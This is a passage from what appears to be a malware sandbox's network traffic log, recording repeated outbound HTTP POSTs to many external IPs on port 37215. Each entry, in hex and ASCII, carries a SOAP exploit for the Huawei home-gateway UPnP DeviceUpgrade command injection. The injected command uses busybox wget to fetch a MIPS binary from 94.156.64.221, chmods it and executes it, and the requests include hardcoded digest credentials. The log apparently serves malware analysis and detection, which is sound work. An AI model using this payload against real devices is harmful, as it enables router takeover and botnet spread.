2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    249192.168.2.2345198156.145.248.2737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.253905058 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    250192.168.2.2336686197.78.230.7837215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.253940105 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    251192.168.2.233303841.208.140.23937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.253978014 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    252192.168.2.2350018197.215.229.11037215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.254034996 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    253192.168.2.2349882197.121.136.8137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.254086018 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    254192.168.2.234408641.139.184.9737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.254180908 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    255192.168.2.234922441.43.208.25537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.254230022 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    256192.168.2.2359806197.33.181.1237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.254259109 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    257192.168.2.233848641.84.23.11837215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.254303932 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    258192.168.2.2360452156.6.171.12837215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.254354000 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    259192.168.2.233422641.74.251.9137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.254379034 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
